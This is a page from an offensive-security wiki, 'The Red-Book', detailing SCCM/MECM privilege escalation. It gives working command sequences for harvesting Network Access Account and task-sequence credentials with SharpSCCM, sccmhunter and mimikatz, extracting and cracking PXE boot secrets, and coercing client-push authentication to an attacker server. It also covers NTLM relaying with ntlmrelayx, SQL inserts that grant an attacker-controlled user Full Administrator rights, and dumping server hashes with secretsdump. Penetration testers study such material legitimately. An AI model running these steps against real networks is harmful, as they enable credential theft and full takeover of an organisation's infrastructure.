Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Credential harvesting
  • PXE/OSD (Operating System Deployment)
  • Authentication Coercion via Client Push Installation
  • SCCM Site Takeover
  • Resources

Was this helpful?

Edit on GitHub
  1. Active Directory Pentesting
  2. Movement
  3. SCCM / MECM

Privilege Escalation

Last updated 11 months ago

Was this helpful?

Theory

Currently there are three different pathways for privilege escalation routes in an SCCM environment and take control over the infrastructure:

  • Credential harvesting: includes all the ways that could permit to retrieve SCCM related credentials in the environment.

  • Authentication Coercion: with a compromised machine in an Active Directory where SCCM is deployed via Client Push Accounts on the assets, it is possible to have the "Client Push Account" authenticate to a remote resource and, for instance, retrieve an NTLM response (i.e. ). The "Client Push Account" usually has local administrator rights to a lot of assets.

  • SCCM site takeover: a NTLM authentication obtained from the SCCM primary site server can be relayed to the SMS Provider or the MSSQL server in order to compromise the SCCM infrastructure.

  • SCCM site takeover from a passive site server: as describer by in this , when a passive site server is setup for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database

Credential harvesting

The following SCCM components can be found on SCCM clients and may contain credentials

  • Device Collection variables

  • TaskSequence variables

  • Network Access Accounts (NAAs)

  • Client Push Accounts

  • Application & Scripts (potentially)

Find more details about these components in post.

Network Access Accounts (NAAs)

NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. To do this, the SCCM server sends the NAA policy to the machine, which will store the credentials encrypted by DPAPI on the disk. The credentials can be retrieved by requesting the WMI class in the CIM store in a binary file on the disk.

NAA doesn't need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts.

It is worth to note that, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers.

SystemDPAPIdump

SystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN

Manualy

On the other hand, it is possible, from a controlled computer account, to manually request the SCCM policy and retrieve the NAAs inside.

Step 1: Gain control over a computer account password.

For this step, it is possible to create a new computer account (if permited by the domain policy), instead of compromise a domain computer.

addcomputer.py -dc-ip $DC -computer-name controlledComputer$ -computer-pass controlledPassword $DOMAIN/$USER:$PASSWORD

Step 2: Use sccmwtf.py to extract NAA secrets

A controlled computer account is needed to send the authenticated request (this is why a computer account has been created previously) to retrieve the policy, but the account to spoof doesn't need to be the same.

Here, $SCCM_MP_NetBiosName takes the value of the SCCM Management Point server NETBIOS name.

sccmwtf.py fakepc fakepc.$DOMAIN $SCCM_MP_NetBiosName "$DOMAIN\controlledComputer$" "controlledPassword"

Step 3: Obtain obfuscated NAA secrets

The obufscated NAA secrets will be saved in a local file.

cat /tmp/naapolicy.xml

Values to decode are the long hexadecimal strings in the CDATA sections (<![CDATA[String_here]).

Step 4: Decode obfuscated strings

policysecretdecrypt.exe $HEX_STRING

SCCMHunter

HTTP

#Create a new computer account and request the policies
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto

#To use an already controlled computer account
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP

DPAPI

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally From WMI
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_NetworkAccessAccount

# Extracting from CIM store
SharpSCCM.exe local secretes disk

# Extracting from WMI
SharpSCCM.exe local secretes wmi

# Using SharpDPAPI
SharpDPAPI.exe SCCM

# Using mimikatz
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # dpapi::sccm

SharpSCCM also permits to request the SCCM policy remotely to retrieve the NAA credentials inside.

SharpSCCM.exe get secretes

TaskSequence variables

TaskSequence are steps that can be configured by an administrator to perform specific actions, for example "Sequence for adding a machine to the domain". Think of it as a script that runs. These TaskSequences can contain variables that can contain credentials. These sequences can use device collection variables (presented in the next section) as conditions.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_TaskSequence

# Extracting from CIM store
SharpSCCM.exe local secrets -m disk

# Extracting from WMI
SharpSCCM.exe local secrets -m wmi

SharpSCCM also permits to request the SCCM policy remotely to retrieve the NAA credentials inside.

SharpSCCM.exe get secrets

Device Collection variables

Devices enrolled in an SCCM environment can be grouped by collection. These exist by default, but administrators can create custom collections (for example "Server 2012 devices"), and add variables for these collections that will be used, for example, during application deployement to check some conditions. These variables may very well contain credentials and be found locally on the clients.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_CollectionVariable

# Locally from CIM store
SharpSCCM.exe local secrets -m disk

# Locally from WMI
SharpSCCM.exe local secrets -m wmi

PXE/OSD (Operating System Deployment)

Credential harvesting

The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.

Several secrets could be retreived from Operating System Deployment (OSD)

  • Collection variables

  • Account to write image to SMB share

  • Account to pull files from SMB share

  • Set local admin password

  • Run arbitrary command

  • Account to join the domain (Apply Network Settings)

No Password

sudo python3 pxethiefy.py explore -i eth0

Password Protected

sudo python3 pxethiefy.py explore -i eth0
# Seting up Hashcat 
cd /workspace
git clone https://github.com/hashcat/hashcat.git
git clone https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module
cp configmgr-cryptderivekey-hashcat-module/module_code/module_19850.c hashcat/src/modules/
cp configmgr-cryptderivekey-hashcat-module/opencl_code/m19850* hashcat/OpenCL/
cd hashcat
git checkout -b v6.2.5 tags/v6.2.5
make

# Crack the hash
hashcat/hashcat -m 19850 --force -a 0 /workspace/pxe_hash /usr/share/wordlists/rockyou.txt

Decrypt the file using the found password

pxethiefy.py decrypt -p "password" -f ./2023.05.05.10.43.44.0001.{85CA0850-35DC-4A1F-A0B8-8A546B317DD1}.boot.var

No Password

python.exe pxethief.py 2 $SCCM_IP

Password Protected

python.exe pxethief.py 2 $SCCM_IP

Download the encrypted files specified by PXEThief, and print the hash

# Retreive files
tftp -i 192.168.33.11 GET "\SMSTemp\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" "2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var"

# Get the hash
python.exe pxethief.py 5 '.\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var'

Decrypt the file using the found password

py.exe pxethief.py 3 ".\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" password

Missconfiguration

If "Enable command support" is enabled, we can spawn a shell during OS deployment by pressing F8.

Authentication Coercion via Client Push Installation

In some case, the "Client Push Accounts" could even be part of the Domain Admins group, leading to a complete takeover of the domain.

The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs.

Option 1: Forcefully "coerce" the Client Push Installation

Step 1: Prepare coercion receiver

Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).

# On Linux
## Relay using ntlmrelayx.py
ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179
# On Windows
## Credential capture using Inveigh 
Inveigh.exe

Step 2: Trigger Client-Push Installation

# If admin access over Management Point (MP)
SharpSCCM.exe invoke client-push -t <AttackerServer> --as-admin

# If not MP admin
SharpSCCM.exe invoke client-push -t <AttackerServer>

Step 3: Cleanup

If you run the above SharpSCCM command with the --as-admin parameter (cause you have admin privileges over the MP), there's nothing to do. Otherwise get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t <AttackerServer> parameter. This is the device name that will appear in SCCM.

Option 2: Wait for Client Push Installation

# Credential capture using Inveigh 
Inveigh.exe

SCCM Site Takeover

The user account that installs the site must have the following permissions:

  • Administrator on the following servers:

    • The site server

    • Each SQL Server that hosts the site database

    • Each instance of the SMS Provider for the site

  • Sysadmin on the instance of SQL Server that hosts the site database

This means that it is possible to obtain administrative access on the site database server, or interact as a local administrator with the HTTP API on the SMS Provider, by relaying a NTLM authentication coming from the primary site server, for example by coercing an automatic client push installation from it, and granting full access on the SCCM site to a controlled user.

Relay to the MSSQL site database

Some requirements are needed to perform the attack:

  • fallback to NTLM authentication is enabled (default)

  • PKI certificates are not required for client authentication (default)

  • either:

    • MSSQL is reachable on the site database server

    OR

    • SMB is reachable and SMB signing isn’t required on the site database server

  • knowing the three-character site code for the SCCM site is required (step 3 below)

  • knowing the NetBIOS name, FQDN, or IP address of a site management point is required

  • knowing the NetBIOS name, FQDN, or IP address of the site database server is required

  1. Retrieve the controlled user SID

The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant "Full Administrator SCCM role" to, on the site database server. The hex formatted SID is needed in a part below: https://github.com/v4resk/red-book/blob/main/ad/movement/sccm-mecm/sccm-mecm.md#4.-obtain-an-sql-console.

rpcclient -c "lookupnames USER" $TARGET_IP
lookupsid.py "$DOMAIN"/"$USERNAME":"$PASSWORD"@"$TARGET_IP_OR_NAME"
from impacket.ldap import ldaptypes
sid=ldaptypes.LDAP_SID()
sid.fromCanonical('sid_value')
print('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))
# this should be run on the windows SCCM client as the user (no need for admin privileges here)
SharpSCCM.exe get user-sid
  1. Setup NTLM relay server

# targetting MS-SQL
ntlmrelayx.py -t "mssql://siteDatabase.domain.local" -smb2support -socks

# targeting SMB
ntlmrelayx.py -t "siteDatabase.domain.local" -smb2support -socks
  1. Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

The rest of this page is focusing on relaying the authentication on the MS-SQL service.

  1. Obtain an SQL console

proxychains mssqlclient.py "DOMAIN/SCCM-Server$"@"siteDatabase.domain.local" -windows-auth

Once the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.

--Switch to site database
use CM_<site_code>

--Add the SID, the name of the current user, and the site code to the RBAC_Admins table
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (<SID_in_hex_format>,'DOMAIN\user',0,0,'','','','','<site_code>');

--Retrieve the AdminID of the added user
SELECT AdminID,LogonName FROM RBAC_Admins;

--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the “All Objects” scope (SMS00ALL), 
--the “All Systems” scope (SMS00001), 
--and the “All Users and User Groups” scope (SMS00004)
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00004','1');

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
.\SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Post exploitation via SCCM can now be performed on the network.

Relay to the HTTP API AdminService

Some requirements are needed to perform the attack:

  • The HTTP API for the AdminService service is reachable on the SMS Provider server

  • knowing the NetBIOS name, FQDN, or IP address of a site management point is required

  • knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required

  1. Setup an NTLM relay server

ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname "DOMAIN\USER" --displayname "DOMAIN\USER" --objectsid <USER_SID>
  1. Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

If the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the sms provider server, the controlled should be now a SCCM site admin.

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Relay from a passive site server to the active site server

Some requirements are needed to perform the attack:

  • a passive site server is present on the network and its reachable

  • knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required

  • SMB signing is not required on the active site server (default)

  1. Setup an NTLM relay server

ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks
  1. Authentication coercion

If the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights.

  1. Dump active site server account credentials

proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\$@$ACTIVE_SERVER.$DOMAIN

Retrieve the LM:NT hash of the server account.

  1. Add a new SCCM Full Admin

sccmhunter.py admin -u $ACTIVE_SERVER\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP

() (C:\) >> add_admin controlledUser <controlledUser_SID>
() (C:\) >> show_admins

Post exploitation via SCCM can now be performed on the network.

Resources

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, (Python) can be used to decipher via DPAPI the WMI blob related to SCCM and retrieve the stored credentials. Additionally, the tool can also extract SYSTEM DPAPI credentials.

The tool author () warns not to use this script in production environments.

To decode username and password use .\DeobfuscateSecretString.exe contained in or

Alternatively, (Python) automates all the attack with, or without, an already controlled computer accounts. For this purpose, the http module uses the result from the find command and enumerates the remote hosts for SCCM/MECM enrollment web services. If it finds one, it performs 's attack for the specified computer account. If no account is already under control, the -auto flag can be indicated to create a new computer account.

(Python) DPAPI's module can also be used, with valid credentials for a local administrator on the target system, to remotely extract NAA credentials located in the local WMI repository.

From a Windows machine enrolled in the SCCM environment, (C#), , (C) or a PowerShell command, can be used with, administrative rights, to extract the NAA credentials locally.

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, (Python) can be used to extract the TaskSequence variables remotely.

From a Windows machine enrolled in the SCCM environment, (C#) or a PowerShell command can be used with, administrative rights, to extract the TaskSequence variables locally.

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, (Python) can be used to extract the TaskSequence variables remotely.

From a Windows machine enrolled in the SCCM environment, (C#) or a PowerShell command can be used with, administrative rights, to extract the collection variables locally.

Without PXE password protection, we can use (Python) as follow, to extract secrets from the Operating System Deployment.

If a PXE password is set, we can use (Python) as follow. It will automaticly download encrypted files and extract the hash.

We can then try to crack it using Christopher Panayi’s .

Without PXE password protection, we can use as follow, to extract secrets from the Operating System Deployment.

If PXE password is set, we can start with

We can then try to crack it using Christopher Panayi’s . (check the UNIX-like tab for more details).

Important note: You want to read post before you continue this route, as this attack might leave traces behind and might junk up the SCCM environment.

The primary site server's computer account is member of the local Administrators group on the site database server and on every site server hosting the "SMS Provider" role in the hierarchy (See ).

(source: )

For more details about how these attacks work, refer to the article "" by for the database attack, and "" by for the HTTP one.

automatic site assignment and automatic site-wide are enabled

the hotfix not installed (it prevents the client push installation account to perform an NTLM connection to a client)

The first four requirements above apply to the . But without them, a regular coercion technique could still be used (petitpotam, printerbug, etc.).

From UNIX-like systems, the Samba utility named can be used for this purpose.

Impacket's (Python) can also be used to retrieve the user's SID.

The returned SID value is in canonical format and not hexadecimal, can be used to convert it as follows.

From Windows systems, (C#) can be used for this purpose.

The target of the must be set to the site database server, either on the MS-SQL (port 1433/tcp), or SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page is focusing on relaying the authentication on the MS-SQL service.

From UNIX-like systems, 's (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.

From Windows systems, (Powershell) can be used as an alternative to 's , however it doesn't feature the same SOCKS functionality, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.

Fore more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: .

The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with (C#). For more information, see the corresponding article "" by . Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (, , , , etc.).

From UNIX-like systems, authentication can be coerced through , , , , etc. (not based on triggering the client push installation).

